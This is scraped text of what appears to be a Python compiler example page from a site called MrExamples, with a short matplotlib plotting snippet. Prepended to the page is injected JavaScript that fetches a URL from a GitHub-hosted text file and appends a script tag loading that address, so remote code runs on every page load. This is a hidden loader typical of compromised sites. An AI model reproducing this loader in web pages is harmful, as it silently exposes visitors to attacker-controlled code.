;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); python-compiler python Python-compiler - MrExamples

Python Compiler : Python

import matplotlib.pyplot as pt import numpy as npy y_plane = npy.array([33, 354, 33]) pt.plot(y_plane, marker = 'o') pt.show()